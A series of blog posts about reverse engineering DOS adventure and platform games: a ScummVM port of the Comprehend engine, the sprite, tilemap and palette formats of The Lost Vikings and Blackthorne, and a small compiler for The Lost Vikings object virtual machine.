ScummVM – Comprehend

I’ve been working on porting my implementation of the Comprehend adventure game engine (https://github.com/RyanMallon/recomprehend) to ScummVM. The Comprehend engine was developed by Polarware and used to create a number of graphical/text adventure games including Transylvania, Crimson Crown and Oo-Topos. The game Transylvania holds a bit of nostalgia for me as it was the very first adventure game I ever played way back on the Apple ][. The games were later ported to a variety of platforms including DOS, which is the version I reverse engineered.

dosbox.png

The DOS version of Transylvania

Currently the only game supported is Transylvania, and though there is still a bunch of work needed to support the engine properly, a full playthrough of the game is possible.

I’m not a C++ developer, so I’ve been stumbling my way through the porting work. I have found the ScummVM source base very cleanly designed and easy to work with though.

If you want to give it a try (you will need a copy of the DOS version of Transylvania):

git clone https://github.com/RyanMallon/scummvm.git
cd scummvm
git checkout comprehend
./configure
make
./scummvm
scummvm

Transylvania running in ScummVM

There are a bunch of things that still need to be done:

  • The code is still a bit of a mess. I’ll need to tidy it up before attempting to get this merged.
  • Only Transylvania is currently supported (and only one of its handful of DOS variants). My Re-Comprehend implementation supports Crimson Crown and Oo-Topos also, so those games will eventually be added.
  • The title, before-game, and ending screens are not implemented for Transylvania.
  • The graphics don’t emulate the CGA correctly. The DOS version of the game uses a 128 colour palette which maps to dithered fills in the 4 colour CGA mode. I simplified my implementation of the graphics code by just using solid colours. Some of the colour choices need tweaking.
  • The graphics bleed in a few places. This is probably caused by the line algorithm provided by ScummVM not exactly matching the one used by the original Comprehend games.
  • The sentence parser is very basic. It does not yet handle word pairs (the original engine can convert some pairs of words into a single token) or conjunctions.
  • Pressing enter to flip between full text and graphics modes doesn’t work as it did in the original games.

Finally, a massive thanks to Mark Pelczarski, one of the developers of the original Comprehend games. I contacted him after doing the reverse engineering work, and he took the time to dig out some old material and give me some insight into the design of the original engine.

Old School Blizzard: Sprites, Maps and Palettes

I’ve been reverse engineering two of Blizzard’s early DOS games, The Lost Vikings and Blackthorne. I’ve previously written about the virtual machine that The Lost Vikings uses for implementing game objects here and here. Blizzard has now made both The Lost Vikings and Blackthorne freely available on Battle.net. Note that Blizzard went by the name Silicon and Synapse for their early games including The Lost Vikings. Blackthorne was the first game released under the Blizzard brand.

This post is about how the sprite formats and tile engine are implemented for the games. The two games use very similar engines, with Blackthorne having a few improvements over The Lost Vikings. I’ll refer to the game engine for both games as the “Blizzard engine”.

The games store all of their data in a single pack file called DATA.DAT. The pack file is an archive which contains chunks for sprites, levels, sounds etc. Most of the chunks in the pack file are compressed using a variant of the LZSS compression algorithm.
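
For reference, a generic LZSS decompressor has roughly the following shape. This is only a sketch: the flag bit ordering and the 12-bit offset/4-bit length encoding below are placeholders, not the exact variant used by the Blizzard pack file.

#include <stddef.h>
#include <stdint.h>

/*
 * Rough sketch of a generic LZSS decompressor, not the exact variant
 * used by the Blizzard pack file. The flag bit order and the 12-bit
 * offset/4-bit length back-reference encoding are placeholder
 * assumptions.
 */
static size_t lzss_decompress(const uint8_t *src, size_t src_len,
                              uint8_t *dst, size_t dst_len)
{
    size_t in = 0, out = 0;

    while (in < src_len && out < dst_len) {
        uint8_t flags = src[in++];

        /* Each flag byte describes the next eight items. */
        for (int bit = 0; bit < 8 && in < src_len && out < dst_len; bit++) {
            if (flags & (1 << bit)) {
                /* Literal byte. */
                dst[out++] = src[in++];
            } else {
                /* Back reference into the already decompressed data. */
                if (in + 1 >= src_len)
                    return out;

                uint16_t word = src[in] | (src[in + 1] << 8);
                size_t offset = word & 0x0fff;
                size_t length = (word >> 12) + 3;

                in += 2;
                if (offset == 0 || offset > out)
                    return out;

                for (size_t i = 0; i < length && out < dst_len; i++, out++)
                    dst[out] = dst[out - offset];
            }
        }
    }

    return out;
}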

I’ve developed a set of basic tools which can be used to view sprites, levels, etc from The Lost Vikings and Blackthorne. You can download the tools from GitHub. I’ve included the command invocations to view the various examples throughout this blog post. All of the screenshots in this post were captured using these tools.

splash

./sprite_view DATA.DAT -fraw -s -u -w344 -p 0x17b 0x17c
./level_view --blackthorne DATA.DAT 1 -h0x6e

Graphics Mode

Both games use the popular “Mode X” VGA mode. Mode X is a 256 colour, 320×240 planar graphics mode. Planar graphics means that, rather than pixels being arranged linearly as they are in the 320×200 VGA Mode 13h, they are divided into a set of planes. Planar graphics were originally developed to boost graphics throughput by allowing multiple memory chips to store independent planes and deliver them in parallel. This Shikadi.net article gives a good explanation of how planar graphics work.

Mode X uses four planes. The first plane stores pixels 0, 4, 8, etc. The second stores pixels 1, 5, 9, etc. So for an 8×2 sprite rather than the pixels being stored linearly as:

0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15

Planar Mode X stores them as:

0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15
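
As a small illustration (my own, not code from the game), the mapping from a pixel coordinate to its location in the planar data looks like:

/*
 * Sketch: compute the offset of pixel (x, y) within Mode X planar
 * sprite data for a sprite of the given width and height. The plane
 * is selected by x modulo 4; within each plane the pixels are stored
 * linearly.
 */
static int planar_offset(int x, int y, int width, int height)
{
    int plane = x % 4;
    int index = ((y * width) + x) / 4;

    return (plane * (width * height) / 4) + index;
}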

I did most of the reverse engineering of the sprite formats by looking at the data in the pack file chunks rather than looking at the rendering code in IDA. I have a very rudimentary understanding of DOS and VGA programming, and rendering code for old games tends to use every optimization trick in the book and clever handcoded assembler, which is difficult (for me) to understand.

Raw Sprite Format

The first sprite format used by the games is just raw encoded planar data. Raw sprites can have any width and height that is divisible by four. Drawing raw sprites is simple:

for (plane = 0; plane < 4; plane++) {
    for (i = 0; i < (sprite_width * sprite_height) / 4; i++) {
        offset = (i * 4) + plane;
        y = offset / sprite_width;
        x = offset % sprite_width;

        pixel = *sprite++;
        dst[((dst_y + y) * dst_width) + (dst_x + x)] = pixel;
    }
}

Optionally a colour index could be chosen as a transparent colour. Raw sprites of a given width and height always have the same data size, but they are not particularly space efficient. This is especially true for the Blizzard game engine because sprites use only sixteen colours (always values 0x0 to 0xf), meaning that four bits per pixel are wasted. The reason for using only sixteen colours per sprite is to enable some clever palette tricks which are explained later.

Unpacked/Masked Sprite Format

The second sprite format allows for transparency without sacrificing a colour index, at the cost of a more complex drawing algorithm and slightly larger data size. In the tools I developed I’ve called this format “unpacked”, but “masked” might be a better term.

In this sprite format, each set of eight pixels is preceded by a mask byte which specifies which pixels are to be drawn. The transparent pixels are still encoded with the value 0x0 but are skipped over when drawing. This allows the colour index 0x0 to be used as an additional colour.

The algorithm for drawing these sprites looks like this:

for (plane = 0; plane < 4; plane++) {
    x = plane;
    y = 0;
    for (i = 0; i < (sprite_width * sprite_height) / 4 / 8; i++) {
        mask = *sprite++;
        for (bit = 7; bit >= 0; bit--) {
            pixel = *sprite++;

            if (mask & (1 << bit))
                dst[((dst_y + y) * dst_width) + (dst_x + x)] = pixel;

            x += 4;
            if (x >= sprite_width) {
                y++;
                x = plane;
            }
        }
    }
}

The various collectible items in The Lost Vikings are 16×16 unpacked/masked sprites. They can be viewed with:

./sprite_view DATA.DAT -l2 -funpacked -w16 -h16 0x12f

tlv_items

Packed 32×32 Sprites

The final sprite format is only used in The Lost Vikings and is optimized for drawing 32×32 sprites. Like the unpacked/masked format, each set of eight pixels is preceded by a mask byte indicating which pixels to draw. However, the packed format does not store the transparent pixels, and packs two pixels into each byte since only sixteen colours are used. If the number of pixels to be drawn is odd, then the final half byte is zero.

This format is more space efficient than the other two formats, but has a more complex drawing algorithm and variable length sprites. Pack file chunks which contain packed format sprites start with a header of 16-bit values indicating the starting offset of each sprite.
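
Looking up a sprite via that header might look like the following sketch; the offsets are assumed here to be relative to the start of the chunk:

#include <stdint.h>

/*
 * Sketch: locate a packed sprite within a chunk that begins with a
 * table of 16-bit little-endian offsets, one per sprite. The offsets
 * are assumed to be relative to the start of the chunk.
 */
static const uint8_t *packed_sprite(const uint8_t *chunk, int index)
{
    uint16_t offset = chunk[index * 2] | (chunk[(index * 2) + 1] << 8);

    return chunk + offset;
}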

The algorithm for drawing the packed sprites is as follows:

for (plane = 0; plane < 4; plane++) {
    for (y = 0; y < 32; y++) {
        num_pixels = 0;
        mask = *sprite++;
        for (bit = 7; bit >= 0; bit--) {
            if (mask & (1 << bit)) {
                pixel = *sprite;
                if (num_pixels & 1)
                    sprite++;
                else
                    pixel >>= 4;
                pixel &= 0xf;

                x = ((7 - bit) * 4) + plane;
                dst[((dst_y + y) * dst_width) + (dst_x + x)] = pixel;

                num_pixels++;
            }
        }
        if (num_pixels & 1)
            sprite++;
    }
}

While writing this blog post I found this sprite, which uses the packed 32×32 format, in the header for The Lost Vikings' second level. However, I don’t remember ever seeing it in the game. Does anybody know if it is a secret or an unused leftover asset? View it with:

./sprite_view DATA.DAT -l2 -fpacked32 0xec -b0x10

tlv_secret_guy

Why Multiple Sprite Formats?

This is a question I can’t fully answer. I am by no means an expert in the intricacies of optimized VGA programming. It’s possible that the different formats are used to improve rendering speed for sprites that need to be updated frequently vs infrequently. Tiles for the maps are always raw format. The raw format is also used for some HUD (heads-up display) sprites. Sprites using the packed 32×32 format include the vikings and many enemies. The unpacked sprite format is used for some less animated enemies like the gun turret, and other objects like switches and elevators.

Blackthorne doesn’t appear to use the 32×32 packed format at all, probably because many of Blackthorne’s sprites are larger than 32×32. Most of the highly animated sprites use the raw format. Blackthorne does not have scrolling levels (it is screen to screen like the original Prince of Persia), which also makes rendering quicker.

One thing I don’t yet fully understand is how the Blizzard engine knows which sprite format and size to draw for each object. There is some information in the level headers which corresponds to this, but it isn’t enough to be able to draw all objects correctly. I suspect that parts of the rendering information are managed by the virtual machine.

Sprite Layouts

As mentioned previously, Blackthorne uses larger sprites than The Lost Vikings. Although an algorithm for rendering arbitrarily sized raw sprites can be written, the Blizzard engine takes a different approach. Larger sprites are rendered by composing multiple smaller sprites in a fixed layout. For example, the titular Blackthorne character uses 32×48 sprites, which consist of two 16×16 sprites for the head, and a single 32×32 sprite for the body:

bt_layout_guy

Note that the background colour used here is actually the index 0 colour for the Blackthorne sprites, which is used as the transparent colour in game. You can view the full set of the Blackthorne player sprites with:

./sprite_view --blackthorne DATA.DAT -fraw -w32 -h48 -l2 -b0x80 0x42

It's possible that this approach was taken because Blizzard had already written optimized rendering loops for 16×16 and 32×32 sprites, making it faster to draw large sprites as a set of smaller sprites rather than one large sprite.
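
Conceptually a layout is just a fixed list of component sprites and their offsets within the larger frame. The following sketch is purely illustrative; the structure and values are mine, not the engine's actual layout format:

/*
 * Sketch only: a conceptual view of a sprite layout. The structure
 * and the example values below are illustrative, not the engine's
 * actual layout data format.
 */
struct layout_piece {
    int width, height;   /* size of the component sprite */
    int x, y;            /* offset within the composed frame */
};

/* A 32x48 Blackthorne frame: two 16x16 head pieces, one 32x32 body. */
static const struct layout_piece blackthorne_32x48[] = {
    { 16, 16,  0,  0 },
    { 16, 16, 16,  0 },
    { 32, 32,  0, 16 },
};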

Tilemap Levels

Both The Lost Vikings and Blackthorne use tilemap levels with 16×16 tiles (though I think the art in both games does a really good job of making it look like this isn’t the case). The sprites used for the tiles are actually 8×8. Each tile has a structure, which I called a “prefab”, that details how a set of 8×8 sprites forms a 16×16 tile. Each component piece can be vertically and/or horizontally flipped, allowing the component tiles to be reused.

For example, in the full tileset for the first level of The Lost Vikings you can see several tiles like the ladders which have mirrored versions, but also a number of tiles which reuse a single corner piece, like the riveted blue panels.

tlv_level1_tileset.png

You can view this tileset with:

./tileset_view DATA.DAT 1

The pack file contains a chunk for each tileset describing the prefabs. Each prefab is 8 bytes long, with each of the four component tiles encoded as a 16-bit value. For each 16-bit value, the sprite index is encoded as a 10-bit value, with the remaining 6 bits used for flags. The flags indicate if the sprite is horizontally and/or vertically flipped, and whether this component of the tile is foreground or background. Encoding a foreground/background bit into the prefabs allows the Blizzard engine to use a single tile map to render both layers.
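
Decoding a single 16-bit prefab component might look like the following sketch; the 10-bit sprite index is as described above, but the exact bit positions of the individual flags are my assumptions:

#include <stdbool.h>
#include <stdint.h>

/*
 * Sketch of decoding one 16-bit prefab component. The 10-bit sprite
 * index is described in the text; the positions of the individual
 * flag bits within the upper 6 bits are assumptions.
 */
struct prefab_piece {
    uint16_t sprite;      /* index of the 8x8 component sprite */
    bool     flip_horiz;
    bool     flip_vert;
    bool     foreground;  /* drawn in front of objects rather than behind */
};

static struct prefab_piece decode_prefab_piece(uint16_t value)
{
    struct prefab_piece piece;

    piece.sprite     = value & 0x03ff;      /* low 10 bits */
    piece.flip_horiz = (value >> 10) & 1;   /* flag positions assumed */
    piece.flip_vert  = (value >> 11) & 1;
    piece.foreground = (value >> 12) & 1;

    return piece;
}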

Blackthorne extends the prefab format in two ways. First, the three unused flag bits are used as a colour base. The Lost Vikings only allocates 16 colours for all the map tiles. By adding the colour base bits, Blackthorne is able to use 128 colours for the tiles, though each individual component sprite of the tiles is still limited to 16 colours.

Blackthorne also adds an additional background map layer. This allows the game to have more detailed backgrounds and skies against the jagged foreground tiles. For simplicity I’ll refer to the secondary background layer as the sky layer, and the main tilemap as the foreground and background layers. The sky layer does not use the foreground/background flag bits, so it can be considered a single layer.

The following image shows how the tilemap for the first level of Blackthorne is composited:

bt_level.png

You can view this with (note the level number 3 is used, because levels 1 and 2 are the intro cutscene and practice stage):

./level_view --blackthorne DATA.DAT 3

There are some interesting things to note here:

  • Some parts of the sky layer are completely obscured by the foreground layers. This might be due to Blizzard’s development process or tools.
  • The waterfalls are partially drawn on the sky layer and partially on the background layer. For example, in the bottom right corner, the base of the waterfall is drawn on the sky layer. This is because there is a rock covering the waterfall in the foreground layer. Because of the shape of the rock, this cannot be drawn using a single map with correct foreground/background handling.
  • There are some areas of the map that appear to be missing. For example, the waterfall in the upper middle abruptly ends. This is because Blackthorne uses static rooms instead of scrolling. The empty areas of the map are never visible when playing the game. On some levels this is quite wasteful, as entire screens are unused. Blizzard probably chose to implement the screens on a single tilemap, even though the game doesn’t scroll, so that they could reuse existing code from The Lost Vikings engine.

Everything is a Level

One clever trick Blizzard used is that almost everything in the game (splash screens, cutscenes, menus) is a level. This undoubtedly saved on development time. Because all the hard work of implementing code for game levels with animation and moving objects is already done, it makes sense to reuse that same code to handle cutscenes and menus. I believe the game engine also uses the virtual machine (see my previous blog post) to implement animation in the cutscene levels. One notable exception to this is The Lost Vikings splash screen at the beginning of this post, which is encoded as a large, uncompressed raw sprite.

For example, when the game starts up a number of splash screens are shown. Two of these are encoded into a single level (as two rooms). The left of the image below shows the tileset for the level, while the right hand side shows the level itself. In the game, the silhouette is shown first (it glows; more on this later). The Blackthorne logo is displayed above the main menu.

bt_splash.png

I’m not sure why there are two copies of the Blackthorne logo tiles. Note that they use slightly different colourisation: for example, the TM is black and inside the logo in the top set, but white and outside the logo in the bottom set. Perhaps the tileset is reused for a different splash screen at the end of the game?

You can view the tileset and level for this splash screen with:

./tileset_view --blackthorne DATA.DAT 1 -c 0x6e 
./level_view --blackthorne DATA.DAT 1 -h0x6e

Palette Management

Earlier I talked about how sprites only use sixteen colours each, always encoding the values as 0x0 – 0xf. This is used to allow each level to define its own palette while allowing sprites to be reused across levels.

In The Lost Vikings there are several worlds, including a space world, a prehistoric world, and a wacky candy world. Each has its own colour scheme and enemies. The player controlled vikings only use two sixteen colour palette sets (Olaf and Baleog share a green and yellow colour scheme, Erik has a red and blue scheme). The HUD uses another sixteen colour set, and one more is used for items such as keys and health pickups that appear in all of the worlds. This leaves a sizable portion of the 256 colour palette to be defined by the level. Most of the levels load a 128 colour base palette, followed by a set of eight 16 colour palettes.
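
Presumably the final palette index for a sprite pixel is then just the sprite's 16 colour base plus the 4-bit pixel value; a minimal sketch (the -b base palette offset argument to the sprite viewer plays this role):

#include <stdint.h>

/*
 * Sketch: sprite pixels are always in the range 0x0-0xf, so the final
 * 256 colour palette index is assumed to be the sprite's 16 colour
 * base offset plus the pixel value.
 */
static uint8_t palette_index(uint8_t pixel, uint8_t base)
{
    return base + (pixel & 0x0f);
}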

The per-level palettes also allow sprites to be reused with a different colour scheme. This was a popular trick in the era of 8-bit colour and limited storage space. The Mortal Kombat games famously have a number of palette swapped ninja characters. The following image shows the same dinosaur sprites with the palette settings from two different levels:

tlv_dinosaur

To view the two different versions of the dinosaur sprite:

./sprite_view DATA.DAT -fpacked32 -b0xc0 -l5  0xf8
./sprite_view DATA.DAT -fpacked32 -b0xc0 -l10 0xf8

Note that the level number (-l) and base palette offset (-b) arguments are passed to the sprite viewer program. The level number is used to determine which palette chunks to load by parsing the level header chunk. The base palette index has been determined experimentally. Again, this is something I don’t fully understand in the Blizzard engine, and again I suspect that the base palette index may be specified by instructions in the object’s virtual machine program.

Palette Animations

Another popular trick from the DOS days is animating graphics by changing colours in the palette. Animating an object by redrawing the pixels is quite expensive, especially for something large that needs to be updated frequently, like the background waterfalls in Blackthorne. Instead of modifying the pixels themselves it is much less expensive to modify colours in the palette, which immediately updates all pixels of the corresponding colour. This technique is mostly useful for simple cyclical animations like waterfalls and the blinking lights in The Lost Vikings spaceship levels. As mentioned previously, palette animations are used in Blackthorne to make the silhouette glow in the startup splash screen.

The Blizzard engine implements palette animations in the level header. Each palette animator has an 8-bit speed value and two 8-bit colour index values. If the two indexes are not equal, then the animation cycles the colour values between the two indexes. This format is good for animating things like the waterfalls and blinking lights, which appear to move in a pattern.
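
A sketch of one step of this kind of colour cycling; whether the engine rotates the entries up or down, and how the speed value is applied, are assumptions:

#include <stdint.h>

struct rgb {
    uint8_t r, g, b;
};

/*
 * Sketch: one step of a cyclic palette animation which rotates the
 * colour values between two palette indexes. The direction of the
 * rotation and how the 8-bit speed value is applied are assumptions.
 */
static void palette_cycle_step(struct rgb *palette, int first, int last)
{
    struct rgb saved = palette[last];

    for (int i = last; i > first; i--)
        palette[i] = palette[i - 1];

    palette[first] = saved;
}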

If the two indexes are equal, then the palette animation is for a single colour and the level header specifies a list of 16-bit values for the animation. The 16-bit values each encode a colour in RGB-555 format (meaning 5 bits per channel, so one bit is wasted). The normal VGA palette, and the Blizzard engine, is capable of 6 bits per channel. The palette animations lose the least significant bit: each 5-bit value is shifted left by one to produce the 6-bit value. This palette animation format is useful for animating something like a pulsing light.
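
Unpacking one of these 16-bit values into the 6-bit per channel values the VGA palette uses looks like this sketch (the channel ordering, with red in the high bits, is an assumption):

#include <stdint.h>

/*
 * Sketch: unpack a 16-bit RGB-555 palette animation value into 6-bit
 * per channel VGA values by shifting each 5-bit component left by one.
 * The channel ordering (red in the high bits) is an assumption.
 */
static void unpack_rgb555(uint16_t value, uint8_t *r, uint8_t *g, uint8_t *b)
{
    *r = ((value >> 10) & 0x1f) << 1;
    *g = ((value >> 5) & 0x1f) << 1;
    *b = (value & 0x1f) << 1;
}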

You can press ‘A’ in the level viewer to show the palette animations.

Game Over

That’s all for now:

./level_view DATA.DAT 48
./level_view --blackthorne DATA.DAT 23

game_over.png

Recompiling the Lost Vikings

In my previous blog post I talked about reverse engineering the virtual machine used to implement objects in The Lost Vikings. The Lost Vikings was released in 1993 by Silicon and Synapse, now better known as Blizzard.

At the time I empirically tested some opcodes by manually patching the original data chunks with a hex editor. This works, but it is fairly tedious, and doesn’t scale well to experimenting with larger programs, or programs that contain loops or jumps. In the first blog post I suggested that creating a simple language and compiler would be useful for further reverse engineering the virtual machine. So, I did.

Building a Compiler

To assist reverse engineering the virtual machine, and also allow for easy creation of new programs I decided to build a compiler. To keep things simple I opted for a single pass, recursive descent parser.

The compiler design is very much based on the PL/0 type compilers often taught in university compiler courses (see PL/0). I won’t go into all the details of writing a basic compiler as there are tons of resources available which already cover this. Basically the compiler takes a source program, performs lexical analysis to create a stream of tokens, and then parses the program, generating code as it goes.

Lost Vikings C

I created a very simple C-like language for implementing object programs in. One advantage of using a C-like language is being able to reuse the existing C preprocessor to support defining constants and macros. The language does not allow for defining variables; you are restricted to the object fields and globals defined by the virtual machine. Built-in functions provide support for generating opcodes such as the yield and spawn object operations. The language makes a few minor deviations from C just to keep the lexer and parser simple.

Sticking with the gun turret object from the first level that I modified in the first blog post, a turret which shoots arrows can be implemented in Lost Vikings C as follows:

#include "vikings.h"

#define timer      field_30
#define DELAY_TIME 40

function main
{
    call set_gfx_prog(0x37bc);

    this.timer = 0;
    while (this.timer != 0xffff) {
        call update_obj();
        call yield();

        if (this.timer != 0) {
            this.timer = this.timer - 1;

        } else {
            // Calculate the offset of the projectile based on the
            // turret's direction.
            if (this.flags & OBJ_FLAG_FLIP_HORIZ) {
                g_tmp_a = this.x - 12;
            } else {
                g_tmp_a = this.x + 12;
            }
            g_tmp_b = this.y - 12;

            // Update the turret animation
            call set_gfx_prog(0x37c8);

            // Spawn an arrow projectile
            call spawn_obj(g_tmp_a, g_tmp_b, 0, 0, 7);

            // Delay for next shot
            this.timer = DELAY_TIME;
        }
    }
}

Each object needs a main loop, which should never terminate. The main loop must call the yield() function to allow the virtual machine processing loop to exit. Failing to do this will cause the game engine to hang. The update_obj() call does basically what it says.

The uses of many of the object fields are left up to the specific object. In this case I’ve used field_30 as a timer to control how quickly the turret shoots. When the timer hits zero, the turret fires, and then rearms the timer.

The only thing left to do now is generate code for this program.

Code Generation

The Lost Vikings virtual machine is not an ideal target for a simple compiler. PL/0 type compilers typically generate code for an abstract stack machine, so a simple statement like:

this.x = this.y + 1;

Would generate code like:

push this.y    ; push this.y onto the stack
push 1         ; push 1 onto the stack
add            ; pop the top two values, add them and push the result
pop this.x     ; pop the result into this.x

The Lost Vikings virtual machine, however, does not have a stack. It has a single temporary register, object fields and globals. The above program could be translated as follows for the Lost Vikings virtual machine:

52 20          ; var = this.y
56 1e          ; this.x = var
51 0001        ; var = 0x0001
59 1e          ; this.x += var

This is much more difficult to generate code for when compiling from a general purpose language. It would probably require generating an intermediate representation in the first pass, and then re-ordering instructions, etc in a second pass to generate the final code.

Abstract Machine

The solution I came up with was to build an abstract stack machine, which is easy to compile for, on top of the Lost Vikings virtual machine. This is made possible by the opcodes for loading and storing globals. These opcodes take an offset in the game's data segment (DS) as their operand, which allows them to be used to load or store any arbitrary address in DS.

The compiler generates code by placing a fake stack at a high location (0xf004) in the data segment. Two locations at the base of the fake stack are reserved for special registers: 0xf000 is a zero register, and 0xf002 is a flag register used for comparisons. The above statement can now be compiled as:

52 20        ; var = this.y
57 f004      ; ds[f004] = var
51 0001      ; var = 0x0001
57 f006      ; ds[f006] = var
53 f006      ; var = ds[f006]
5a f004      ; ds[f004] += var
53 f004      ; var = ds[f004]
56 1e        ; this.x = var

While not particularly high performance this code is easy to generate. My goal is to build a compiler for testing small programs out to determine what opcodes or combinations of opcodes do. I don’t care too much for efficiency, either in time or code size, for the moment.

A second problem in crafting a language for the original virtual machine is that many of the opcodes conditionally call a function. For example, opcode 0x1a checks if the current object has collided with a viking, and if so performs a call. It is more desirable to let the programmer decide whether to use a call or a jump (e.g. an if statement).

I implemented this by emitting code for a generic helper function which sets a flag register and returns. When generating code for an opcode which makes a conditional call, the flag register is first cleared. If the opcode makes the call, then the flag register will be set. The flag can then be tested to emit a conditional jump. So, the following code:

if (call collided_with_viking(0x01)) {
    this.x = 1;
}

Generates the following code:

[c009] 51 0000      ; var = 0x0000
[c00c] 57 f002      ; ds[f002] = var, clear the flag register
[c00f] 1a 01 c0a5   ; if (collided_with_viking(0x01)) call c0a5
[c013] 53 f002      ; var = ds[f002]
[c016] 74 f000 c026 ; if (var == ds[f000]) goto c026
[c01b] 51 0001      ; var = 0x0001
[c01e] 57 f004      ; ds[f004] = var
[c021] 53 f004      ; var = ds[f004]
[c024] 56 1e        ; this.x = var
[c026] ...          ; next instruction after the if block

; Set flag helper function
[c0a5] 51 0001      ; var = 0x0001
[c0a8] 57 f002      ; ds[f002] = var, set the flag register
[c0ab] 06           ; return

The zero register is used here to compare the flag value against. The compiler emits instructions at the beginning of each program to clear the zero register.

Patching Programs

The virtual machine programs for a single world in the game are all packed into a single chunk in the data file. The compiler takes the simple approach of appending the generated code to the end of the chunk and then modifying the object’s program header to point to the patched in program.

This all works in theory, but there is one slight problem. The game stores the virtual machine programs in the extra segment (ES) at a location which is allocated using the DOS memory allocation API. The memory allocation function looks like this:

alloc_mem_func

The call to allocate memory for the virtual machine programs looks like this:

call_alloc_mem

So 0xc000 bytes (48K) is allocated for the programs. The problem is that the chunk for the space world programs is already 48972 bytes in size, leaving only 180 bytes at the end to patch a new program in. Not much when dealing with a compiler which generates extremely verbose code.

I discovered this problem when attempting to compile a larger program. The game started behaving erratically, either hanging or the gun turret object would randomly vanish. These sorts of issues can be difficult to chase down because it could be a bug in my compiler or generated code, a misunderstanding of how some opcode is meant to work, or a bug or limitation in the original game.

The quick solution is to patch the game binary to extend the size of the program allocation. Raising the allocation size to 0xd000 bytes (52k) works fine, and should be plenty of extra space for experimenting with simple programs. I’ve included instructions for this with the compiler.

Empirical Reversing

The goal in building a compiler was to make it easier to reverse the virtual machine. Testing a new opcode involves adding an entry to a dictionary of functions in the code generator class and providing a function for emitting instructions for the opcode. For example, one of the first opcodes I experimented with was 0x41, which appears in a few disassembled programs like the button/question box object.

Its dictionary entry in the compiler initially looked like:

"vm_func_41" : (False, 4, emit_builtin_vm_func_41),

The tuple specifies whether the function returns a value, the number of arguments it takes and the code emitter function. Functions are marked as returning a value if the opcode conditionally makes a call or jump.

I knew from looking at the opcode in IDA that opcode 0x41 was unconditionally executed and took four arguments. Its arguments use the variable type encoding that I discussed in the previous blog post. Its emit function looks like this:

def emit_builtin_vm_func_41(self, reg_list):
    operands = self.pack_args(reg_list, 4)
    self.emit(0x41, *operands)

The pack_args helper function handles the packing of variable type arguments.

It can now be called in a quick test program. For testing I use the collided_with_viking function (opcode 0x1a) so that the opcode I am testing is only triggered when a viking touches the turret. Note that the collided_with_viking function takes a single byte operand which I don’t know the use of, but the value 0x01 seems to work. I also use field_32 of the object as a one-time trigger so that the opcode I am testing is only run the first time a viking touches the object.

My test program looks like this:

function main
{
    call set_gfx_prog(0x37bc);

    this.field_32 = 0;
    while (this.field_32 != 0xffff) {
        call update_obj();
        call yield();

        if (call collided_with_viking(0x01)) {
            if (this.field_32 == 0) {
                call vm_func_41(1, 1, 1, 1);
                this.field_32 = 1;
            }
        }
    }
}

This results in the following graphical corruption in game:

dialog_corrupt_gfx.png

It appears the opcode is used to display a dialog box, but it is unclear why the graphical corruption is occurring. Looking at some of the disassembled programs from the original game shows that opcode 0x41 is usually followed by the unknown opcodes 0xcb and 0x42, neither of which take any arguments. Adding builtins for those opcodes to the compiler and re-running results in the game showing the dialog box, waiting for a keypress, and then removing the dialog box. So, opcode 0x41 is show dialog, opcode 0xcb is wait for key, and opcode 0x42 is clear dialog.

Further experimentation with opcode 0x41 shows that its first argument is the index of the string for the dialog. The strings are, somewhat unfortunately for modding, stored in the game binary. The second argument is still unknown, and the third and fourth arguments control the x and y offset, relative to the object, at which the dialog is displayed.

A good example of why this type of experimental reversing can be useful is to look at the opcode 0xcb in IDA:

func_cb.png

Although this function is small, and what it does is clear (it modifies some globals), it isn’t obvious what effect that has on the game engine. Looking at the cross references for each of the globals in IDA isn’t particularly helpful either. Each of the globals is used in a number of places, none of which make their use immediately obvious. I could have spent a long time in IDA attempting to figure out that setting those globals tells the game engine to wait for a keypress on the next game loop. Empirical testing allowed me to figure it out very quickly. The downside is that I still don’t actually know the exact purpose of each of the globals in the function.

Interesting Fields

One of the interesting things I discovered by experimenting with the compiler is how objects can reference each other. I already knew from my initial reversing that there was some support for this, but the compiler allowed me to quickly work out more of the details.

Field 0x3c in each object specifies a current target object. Some opcodes, such as the collided_with_viking (0x1a) opcode, will automatically set this field, but it can also be set manually. The vikings are always objects 0 (Baleog), 1 (Erik) and 2 (Olaf). Once a target object is set it can be manipulated via the target fields. Each opcode has variants for modifying a field in the current object or a field in the target object. For example, opcode 0x59 adds the temporary register to a field in the current object, whereas opcode 0x5b adds the temporary register to a field in the target object.

Other objects can manipulate fields in the viking objects to control their behaviour. For example, field 0x32 for the vikings is the amount of pending damage. An object can damage a viking by adding to that field. The vikings themselves are partially implemented by programs in the virtual machine. The next time the viking’s program runs it will check the pending damage field and apply damage accordingly.

Other fields of interest are 0x12 and 0x14, which are the x and y velocity for all objects. Prior to writing the compiler I had thought that objects were moved either by adding or subtracting from their x and y offset fields (0x1e and 0x20 respectively) or possibly by using a function type opcode. Instead the game uses a pair of velocity fields. Some objects, such as the vikings, will automatically modify their own velocity. So, for example, if an object sets a viking's velocity to propel it upwards, then on subsequent game loops the viking will adjust its own velocity to cause it to fall back down again.

It seems that there weren’t enough fields in the viking objects to store everything, so each of the vikings' four inventory slots is a global. An object can test if an inventory slot is empty by testing if the corresponding global is zero, and give an item to a viking by directly assigning to an inventory slot global.

Advanced Game Hacking

To experiment with the virtual machine, and demonstrate how flexible it is I wrote a slightly more complex program for the gun turret in the first level. The turret checks which viking has touched it and reacts differently. If Erik touches the turret it gives him items. If Olaf touches it he gets bounced into the air. When Baleog touches it the turret flips around. It looks like this in action:

It’s pretty impressive to see this level of flexibility in a game developed in the early nineties. The source code for this program is included with the compiler in the examples directory.

Future Work

There is still a large number of opcodes, fields and globals that I do not yet understand the function of. The compiler has lots of missing features, for example it currently only supports the == and != comparison operators, and lacks most of the bitwise operators. It’s also a bit cumbersome to use, since it requires separately unpacking the original program chunk from the game data file, patching a new program in, and repacking the data file.

The tools are all open source/public domain, and available on github at: https://github.com/RyanMallon/TheLostVikingsTools. You can also follow me on twitter @ryiron.

Finding The Lost Vikings – Reversing a Virtual Machine

After having fun reverse engineering the Comprehend adventure games (Recomprehend) I was looking for a new DOS game reverse engineering project. Over the years various people have reversed a lot of the old popular games and published specifications and tools for them. The website shikadi.net, for example, has a load of information about games I played as a kid.

